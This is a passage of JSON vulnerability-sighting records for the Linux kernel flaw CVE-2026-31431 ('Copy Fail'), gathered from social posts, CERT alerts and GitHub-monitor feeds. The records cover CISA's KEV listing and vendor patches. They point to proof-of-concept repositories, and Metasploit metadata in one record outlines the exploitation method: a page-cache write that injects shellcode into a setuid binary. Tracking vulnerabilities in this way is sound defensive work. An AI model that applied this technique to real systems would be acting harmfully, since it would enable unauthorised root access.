"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "exploited", "source": "Telegram/dBmf3IHc7_vk8hzgQ1wzPOzIXlDC6C93o_RQuOw8YMcVFA", "content": "", "creation_timestamp": "2026-05-03T11:40:22.000000Z"}, {"uuid": "316626a0-f259-4859-9435-7f2d9ae8080d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/TengkorakCyberCrewzz/10101", "content": "CISA Adds Actively Exploited Linux Root Access Bug CVE-2026-31431 to KEV \u2013 thehackernews.com\n\nSun, 03 May 2026 14:26:00", "creation_timestamp": "2026-05-03T12:03:00.000000Z"}, {"uuid": "bce66acb-bc57-4955-8ad0-6d9e3a00d7b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82631", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a Weekly-Breach-Investigation--006\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a jamal-soc21\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-03 13:49:04\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nRepository documenting the Copy Fail (CVE-2026-31431) Linux kernel vulnerability, a local privilege escalation flaw enabling root access and mapped to MITRE ATT&CK techniques.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-03T14:00:04.000000Z"}, {"uuid": "c31117d8-3d89-4614-9933-39c70e71535f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://www.cert.si/si-cert-2026-03", "content": "", "creation_timestamp": "2026-05-03T06:49:58.000000Z"}, {"uuid": "5d664502-ae44-4095-b193-dc666160482f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hexonbot.bsky.social/post/3mkxvc2ekuc2p", "content": "AI found a Linux kernel bug in 1 hour. Copy Fail (CVE-2026-31431) gives local users root with 732 bytes of Python and turns containers into escape hatches. https://www.hexon.bot/blog/copy-fail-cve-2026-31431-ai-discovered-linux-root #Linux #Cybersecurity #AI", "creation_timestamp": "2026-05-03T19:28:03.948954Z"}, {"uuid": "7c6ea645-d359-4159-b314-4c5f1619a9f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkxw63d4ii2h", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-05-03T19:43:43.981951Z"}, {"uuid": "b473c541-010a-41b2-881c-ec938fdb119f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82660", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a kaleth4\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-03 18:59:54\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-03T19:00:04.000000Z"}, {"uuid": "9b56cac3-6a4a-49df-acb6-bb6420f0a017", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/technoholic.bsky.social/post/3mkxx5siuvv2o", "content": "CISA adds CVE-2026-31431 (CVSS 7.8), a Linux privilege escalation flaw, to KEV due to active exploitation. Stay updated and patch your systems!", "creation_timestamp": "2026-05-03T20:01:28.490347Z"}, {"uuid": "420b3200-cfc1-4a82-9329-b7ff9b07c4bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkykugmtvq2h", "content": "Re: Precise disclosure contents for copyfail (Re: [oss-security] CVE-2026-31431: CopyFail: linux local privilege scalation)", "creation_timestamp": "2026-05-04T01:54:09.227573Z"}, {"uuid": "2a8cfaf3-4150-47dc-81fa-77f59a19ac34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mkxzsxq6vc26", "content": "CVE-2026-31431: The 732-Byte Script That Renders All Linux Kernel Defenses Since 2017 Obsolete +\u00a0Video\n\nIntroduction: A recently disclosed local privilege escalation (LPE) vulnerability identified as CVE-2026-31431 and codenamed \"Copy Fail\" has sent shockwaves through the cybersecurity community.\u2026", "creation_timestamp": "2026-05-03T20:49:07.050052Z"}, {"uuid": "2966a11d-0af0-4714-86a4-c93c206d8d78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/roberio-batista.bsky.social/post/3mky26vueic2b", "content": "Encontrado pelo Xint Code, a vulnerabilidade de seguran\u00e7a Copy Fail (CVE-2026-31431), foi corrigida no Debian, no Ubuntu, AlmaLinux OS e outras distribui\u00e7\u00f5es populares afetadas por essa falha.\n\nOBS: A descoberta foi feita com o apoio de uma ferramenta de intelig\u00eancia artificial chamada Xint Code.", "creation_timestamp": "2026-05-03T20:55:15.466684Z"}, {"uuid": "aca9c81c-0cf0-4891-b889-5375ad55d089", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82664", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CopyFail-for-dummies\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a ChernStepanov\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C++\n\u2b50 Star\u6570\u91cf\uff1a 1  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-03 19:57:38\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nA tiny explanation + PoC for CVE-2026-31431\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-03T20:00:04.000000Z"}, {"uuid": "39f7250e-1190-4124-a316-0cf53ed5ad37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mky376podd22", "content": "Precise disclosure contents for copyfail (Re: [oss-security] CVE-2026-31431: CopyFail: linux local privilege scalation)", "creation_timestamp": "2026-05-03T21:13:50.042397Z"}, {"uuid": "078b3edc-35ed-4f05-a9cb-edda1cadf89b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ninjaowl.ai/post/3mky644nc6h2w", "content": "CISA Adds Actively Exploited Linux Root Access Bug CVE-2026-31431 to KEV #cybersecurity #hacking #news #infosec #security #technology #privacy thehackernews.com/20...", "creation_timestamp": "2026-05-03T22:05:48.688945Z"}, {"uuid": "fcc825c0-7981-4b0a-934d-6a4f275a6996", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/frei-style.net/post/3mky7o5n4tk23", "content": "If you are talking about CVE-2026-31431 (Copy Fail.) then yes, it was discovered with the help of Theori Xint Code, an AI powered software, by the researcher Taeyang Lee who is working for Theori since 2019. Link to the write up: xint.io/blog/copy-fa...", "creation_timestamp": "2026-05-03T22:33:51.734106Z"}, {"uuid": "291d3b72-507b-4e55-ab51-83677d065e1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/edwardk/statuses/116513116081777494", "content": "The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2026-31431, a Linux root access bug also known as Copy Fail, to its Known Exploited Vulnerabilities catalog due to active exploitation. This privilege escalation flaw allows unprivileged local users to gain root access by corrupting the kernel's page cache, posing a significant risk to cloud and containerized environments.https://thehackernews.com/2026/05/cisa-adds-actively-exploited-linux-root.html", "creation_timestamp": "2026-05-03T22:57:41.647420Z"}, {"uuid": "49036ce0-967b-4316-a0ee-4c56bb20af9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/icsda.bsky.social/post/3mkydottyfa2m", "content": "\u4f60\u5404\u4f4d\u7684cPanel\u53c8\u88abSorry\u52d2\u7d22\u4e86\u6c92\uff1f\ud83d\ude05 \u5225\u4ee5\u70baLinux\u5c31\u6c92\u4e8b\uff0cCISA\u628a\u90a3\u500bLPE\u6f0f\u6d1e\uff08CVE-2026-31431\uff09\u5217\u5165KEV\u6e05\u55ae\u5566\uff0c\u6839\u6b0a\u8981\u88ab\u596a\u8d70\u4e86\uff01Fortinet 8.0\u9084\u5728\u8b1bAI\u3001\u91cf\u5b50\u5b89\u5168\uff0c\u9019\u901f\u5ea6\u5dee\u6709\u9ede\u591a\u9f41\u3002\u8d95\u5feb\u4fee\uff0c\u4e0d\u7136\u660e\u5929\u5225\u60f3\u898b\u8001\u95c6\uff01 #\u8cc7\u5b89\u8b66\u5831 #Linux #\u52d2\u7d22\u8edf\u9ad4", "creation_timestamp": "2026-05-03T23:45:45.484702Z"}, {"uuid": "7bc6d0df-f3d5-488b-ade6-de2c95a54d8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/qhz-xmRgIk63jLSrK2_FE81USJ0RiYiUMNcM_dhi03aP8g", "content": "", "creation_timestamp": "2026-05-03T23:33:56.000000Z"}, {"uuid": "1d575e09-9337-4b9e-a455-e495ecaacdf1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/82704", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a BigFix-CopyFail-AlmaLinux-Content\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a kvendler\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-04 03:56:29\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nThis repository contains BigFix Content that I created for identifying the AlmaLinux systems that require patching to remediate CVE-2026-31431\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-04T04:00:04.000000Z"}, {"uuid": "5e3f6d25-6f47-486e-bd75-2036dde3520e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/tech-trending.bsky.social/post/3mkyypu7ozc2r", "content": "WSL2+Docker\u74b0\u5883\u306b\u304a\u3051\u308b\u3001CVE-2026-31431 (Copy Fail) \u3078\u306e\u5bfe\u7b56\u30e1\u30e2\nhttps://zenn.dev/user_thebigslee/articles/41b570658f911b", "creation_timestamp": "2026-05-04T06:02:09.178034Z"}, {"uuid": "5c5364eb-9cc5-4828-9ce0-dfd9d4a070ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/reconbee.bsky.social/post/3mkyyzso4ms2g", "content": "CISA Adds Actively Exploited Linux Root Access Bug CVE-2026-31431 to KEV reconbee.com/cisa-adds-ac...\n\n#CISA #linuxrootaccess #CVE #Linuxroot #cyberattack", "creation_timestamp": "2026-05-04T06:07:46.145954Z"}, {"uuid": "0d768853-e76f-4256-ac1d-782a835adda5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pvynckier.bsky.social/post/3mkyzhcacfs2f", "content": "CISA Adds Actively Exploited Linux Root Access Bug CVE-2026-31431 to KEV thehackernews.com/2026/05/cisa...", "creation_timestamp": "2026-05-04T06:15:47.509227Z"}, {"uuid": "3385142c-2387-4d73-8456-0b2794029c5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82725", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copy-fail-CVE-2026-31431-detection-probe\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a ochebotar\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-04 05:58:51\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-04T06:00:04.000000Z"}, {"uuid": "9ed986f3-df9f-43d1-8a65-03441f88a57a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/mmmmmmpc.bsky.social/post/3mkz4o5vflk2j", "content": "Please Read: @suse.com response to #copyfail CVE-2026-31431 vulnerability:\n* It affects from SLES 12 SP5 to SLES 16\n* It affects Muti-Linux Support 8, 9 and 10\n* Patches have been released by SUSE Engineering\nPlease Patch!\nwww.suse.com/c/suse-respo...", "creation_timestamp": "2026-05-04T07:12:46.775184Z"}, {"uuid": "794c70b1-9496-409f-adbb-d9657f01850d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/samuelvermeulenpro.bsky.social/post/3mkz4soqgbg2e", "content": "#ActuLibre - Copy Fail (CVE-2026-31431) : Synth\u00e8se technique sur cette faille Linux \u00e0 lire sur\nhttps://www.linuxtricks.fr/news/10-logiciels-libres/600-copy-fail-cve-2026-31431-synthese-technique-sur-cette-faille-linux/", "creation_timestamp": "2026-05-04T07:15:18.875973Z"}, {"uuid": "91f2ac63-a47d-4fce-a731-8b81c2ca307b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2026-31431", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/3e01e7d3-c2be-4035-865c-115c5aef1b92", "content": "", "creation_timestamp": "2026-05-04T07:19:37.256007Z"}, {"uuid": "3ceffd20-c9ae-42fb-8598-2dacaa09812e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/adriend.linuxtricks.fr/post/3mkz75n7g4s2s", "content": "Apr\u00e8s la vid\u00e9o sur la faille Copy Fail (CVE-2026-31431), je vous propose cette fois-ci une analyse technique EN FRANCAIS ! (car ce type de contenu manque)\nJ'y ai pass\u00e9 mon dimanche matin !\nClin d'oeil \u00e0 @ponceto91.bsky.social et @korben.info \nwww.linuxtricks.fr/news/10-logi...\n\n#CopyFail #Linux", "creation_timestamp": "2026-05-04T07:57:13.728945Z"}, {"uuid": "bb0e9a66-aa47-4ae8-a5a5-f331db331830", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://ioc.exchange/users/sbeyer/statuses/116515265697196856", "content": "60 Sekunden Cyber KW18 2026, 27. April - 3. Mai:\nDaten von Kunden und Benutzern von Vimeo werden von der Gruppierung ShinyHunters ins Dark Net gestellt, Sicherheitsforscher finden mit Copy Fail eine seit 2017 (!) bestehende Schwachstelle (CVE-2026-31431), mit der man root-Zugriff auf allen bekannteren Linux-Distributionen erhalten kann, das NGO noyb klagt gegen die Hamburger https://podcasters.spotify.com/pod/show/60-sekunden-cyber/episodes/KW18-2026--27--April---3--Mai-e3ir1h5", "creation_timestamp": "2026-05-04T08:04:31.036122Z"}, {"uuid": "1bb3387c-8918-4b42-a7ed-8e35402300e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/r-blueteamsec.bsky.social/post/3mkzbjd4tlm2b", "content": "CVE-2026-31431\uff1a\u6211\u7528 DeepSeek \u590d\u73b0\u4e86 AI \u53d1\u73b0Copy Fail \u63d0\u6743\u7684\u5168\u8fc7\u7a0b - CVE-2026-31431: I used DeepSeek to reproduce the entire process of AI detecting Copy Fail privilege escalation.", "creation_timestamp": "2026-05-04T08:39:32.618452Z"}, {"uuid": "0c85ec5b-4449-4e06-b5b0-d00226bf3fc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ronan.mastodon.ronandev.ovh.ap.brid.gy/post/3mkzekczzhrd2", "content": "https://security-tracker.debian.org/tracker/CVE-2026-31431\n\n\u00ab In the Linux kernel, the following vulnerability has been resolved: crypto: algif_aead - Revert to operating out-of-place This mostly reverts commit 72548b093ee3 except for the copying of the associated data. There is no benefit in [\u2026]", "creation_timestamp": "2026-05-04T09:36:43.160111Z"}, {"uuid": "6a7db408-7251-4e71-9200-1feed75e6d10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/T6MjwEy1GXd0xTLgBckUymGQqfeNIMlbkOpXvJPPSDtMl2M", "content": "", "creation_timestamp": "2026-05-03T15:00:06.000000Z"}, {"uuid": "c10078df-a913-4e2d-9bf1-b73b610760f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/se-nyheter.bsky.social/post/3mkzf6oblyq2a", "content": "Kritisk s\u00e5rbarhet utg\u00f6r ett hot mot Linux-anv\u00e4ndare\n\nhttps://www.europesays.com/se/236328/\n\nS\u00e4kerhetsforskare varnar f\u00f6r Copy Fail (CVE-2026-31431), en kritisk s\u00e5rbarhet som utg\u00f6r ett hot mot anv\u00e4ndare som k\u00f6r ett\u2026", "creation_timestamp": "2026-05-04T09:45:09.977462Z"}, {"uuid": "01f93a89-1924-427e-bfa4-15e7acca5f0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://ioc.exchange/users/sbeyer/statuses/116515712091156433", "content": "60 Sekunden Cyber KW18 2026, 27. April - 3. Mai:\nDaten von Kunden und Benutzern von Vimeo werden von der Gruppierung ShinyHunters ins Dark Net gestellt, Sicherheitsforscher finden mit Copy Fail eine seit 2017 (!) bestehende Schwachstelle (CVE-2026-31431), mit der man root-Zugriff auf allen bekannteren Linux-Distributionen erhalten kann, das NGO noyb klagt gegen die Hamburger Datenschutzbeh\u00f6rde wegen Unt\u00e4\nhttps://www.60-sekunden-cyber.de/kw18-2026/\n#cyber #cybersicherheit", "creation_timestamp": "2026-05-04T09:57:53.725787Z"}, {"uuid": "960dd99c-c976-4ca6-bdf9-149c5625e4a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/bitralix.com/post/3mkzcvi4sff2j", "content": "\ud83d\udea8 La CVE-2026-31431 es una vulnerabilidad cr\u00edtica en Linux que exige una respuesta r\u00e1pida, sobre todo en hosting y servidores\n\n\u2705 En Bitralix hemos preparado un an\u00e1lisis con contexto, mitigaci\u00f3n y una minigu\u00eda para Ubuntu:\nbitralix.es/eqygy\n\n#Bitralix #CVE202631431 #Linux #Hosting #Ubuntu #Seguridad", "creation_timestamp": "2026-05-04T09:04:14.398721Z"}, {"uuid": "fa60b8a3-e1f2-4fed-841e-8849c2ad2c55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1847", "content": "", "creation_timestamp": "2026-05-03T21:00:00.000000Z"}, {"uuid": "5fd1e53d-846a-4d54-a8d5-3c65994e09c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1846", "content": "", "creation_timestamp": "2026-05-03T21:00:00.000000Z"}, {"uuid": "8e002c59-603a-4e85-9b92-2ac926c2a1cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/82731", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copy-fail-CVE-2026-31431-shell\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a g1nt0n1x\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Shell\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-04 07:55:57\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nPoC shell exploit for CVE-2026-31431 (copy_fail) \u2014 Linux LPE via AF_ALG + splice page-cache overwrite. Single-shot, no race condition, kernel 4.9\u20136.18.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-04T08:00:04.000000Z"}, {"uuid": "85aebff3-aab3-474e-92ec-05f0f668598c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/news.humancoders.com/post/3mkzfzsf3kv22", "content": "Copy Fail CVE-2026-31431 : patch kernel Linux et mitigation", "creation_timestamp": "2026-05-04T10:00:21.564370Z"}, {"uuid": "eefc0aa9-56aa-4b70-9aa6-cd4f37362967", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/cve_2026_31431_copy_fail.rb", "content": "{\"actions\": [], \"aliases\": [], \"arch\": \"cmd\", \"author\": [\"Xint Code\", \"rootsecdev\", \"Spencer McIntyre\", \"Diego Ledda\"], \"autofilter_ports\": [], \"autofilter_services\": [], \"check\": true, \"default_credential\": false, \"description\": \"CVE-2026-31431 is a logic flaw in the Linux kernel's authencesn AEAD template that, when reached via the\\n          AF_ALG socket interface combined with splice(), allows an unprivileged local user to perform a controlled\\n          4-byte write into the page cache of any readable file. Because the corrupted pages are never marked dirty, the\\n          on-disk file is unchanged but the in-memory version is immediately visible system-wide, enabling local\\n          privilege escalation by injecting shellcode into the page cache of a setuid-root binary such as /usr/bin/su.\\n          The vulnerability was introduced by an in-place optimization in algif_aead.c (commit 72548b093ee3, 2017) and\\n          affects essentially all major Linux distributions shipped since then until the fix in commit a664bf3d603d.\", \"disclosure_date\": \"2026-04-29\", \"fullname\": \"exploit/linux/local/cve_2026_31431_copy_fail\", \"is_install_path\": true, \"mod_time\": \"2026-04-30 17:51:30 +0000\", \"name\": \"Copy Fail AF_ALG + authencesn Page-Cache Write\", \"needs_cleanup\": null, \"notes\": {\"AKA\": [\"Copy Fail\"], \"Reliability\": [\"repeatable-session\"], \"SideEffects\": [], \"Stability\": [\"crash-safe\"]}, \"path\": \"/modules/exploits/linux/local/cve_2026_31431_copy_fail.rb\", \"platform\": \"Linux,Unix\", \"post_auth\": false, \"rank\": 600, \"ref_name\": \"linux/local/cve_2026_31431_copy_fail\", \"references\": [\"CVE-2026-31431\", \"URL-https://copy.fail/\", \"URL-https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py\", \"URL-https://github.com/rootsecdev/cve_2026_31431\"], \"rport\": null, \"session_types\": [\"shell\", \"meterpreter\"], \"targets\": [\"Linux Command\"], \"type\": \"exploit\"}", "creation_timestamp": "2026-04-30T22:30:05.000000Z"}, {"uuid": "3adc5f55-747b-4d44-8781-8770df2b68ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", 